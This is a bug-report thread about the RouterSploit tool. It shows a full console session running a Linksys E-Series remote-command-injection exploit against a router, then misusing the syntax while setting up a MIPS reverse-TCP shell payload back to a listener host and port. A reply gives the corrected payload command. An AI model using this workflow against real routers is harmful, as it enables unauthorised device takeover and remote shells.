Closed windowshopr closed 1 year ago
it should be set payload mipsle/reverse_tcp
Traceback (most recent call last): File "interpreter.py", line 389, in command_run self.current_module.run() File "eseries_themoon_rce.py", line 54, in run shell(self, architecture="mipsle", method="wget", location="/tmp") File "shell.py", line 124, in shell data = payload.generate() ^^^^^^^^^^^^^^^^^^ File "reverse_tcp.py", line 21, in generate reverse_ip = utils.convert_ip(self.lhost) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "utils.py", line 69, in convert_ip res += bytes([int(i)]) ^^^^^^ ValueError: invalid literal for int() with base 10: ''
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "rsf.py", line 29, in
Is what it says when I try to run the payload
! ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY !
Steps to Reproduce (for bugs)
Your Environment
Current Behavior
It's better if I show you the steps I ran in the output:
[-] 172.16.1.254 Could not find default credentials rsf (AutoPwn) > use exploits/routers/linksys/eseries_themoon_rce rsf (Linksys E-Series TheMoon RCE) > show options
Target options:
Name Current settings Description
ssl false SSL enabled: true/false
target Target IPv4 or IPv6 address
port 80 Target HTTP port
Module options:
Name Current settings Description
verbosity true Verbosity enabled: true/false
arch mipsle Target architecture: mipsbe, mipsle
rsf (Linksys E-Series TheMoon RCE) > set target 172.16.1.254 [+] target => 172.16.1.254 rsf (Linksys E-Series TheMoon RCE) > check [+] Target is vulnerable rsf (Linksys E-Series TheMoon RCE) > run [] Running module exploits/routers/linksys/eseries_themoon_rce... [+] Target is vulnerable [] Invoking command loop... [*] It is blind command injection - response is not available
[+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload' commands.
cmd > show payloads [*] Available payloads:
Payload Name Description
mipsle/bind_tcp MIPSLE Bind TCP Creates interactive tcp bind shell for MIPSLE architecture.
mipsle/reverse_tcp MIPSLE Reverse TCP Creates interactive tcp reverse shell for MIPSLE architecture.
cmd > use mipsle/reverse_tcp [*] Executing 'use mipsle/reverse_tcp' on the device...
cmd > set lhost 172.16.1.228 [*] Executing 'set lhost 172.16.1.228' on the device...
cmd > set lport 4321 [*] Executing 'set lport 4321' on the device...
cmd > run [*] Executing 'run' on the device...
cmd > execute [*] Executing 'execute' on the device...
cmd > use payloads/mipsle/reverse_tcp [*] Executing 'use payloads/mipsle/reverse_tcp' on the device...
cmd >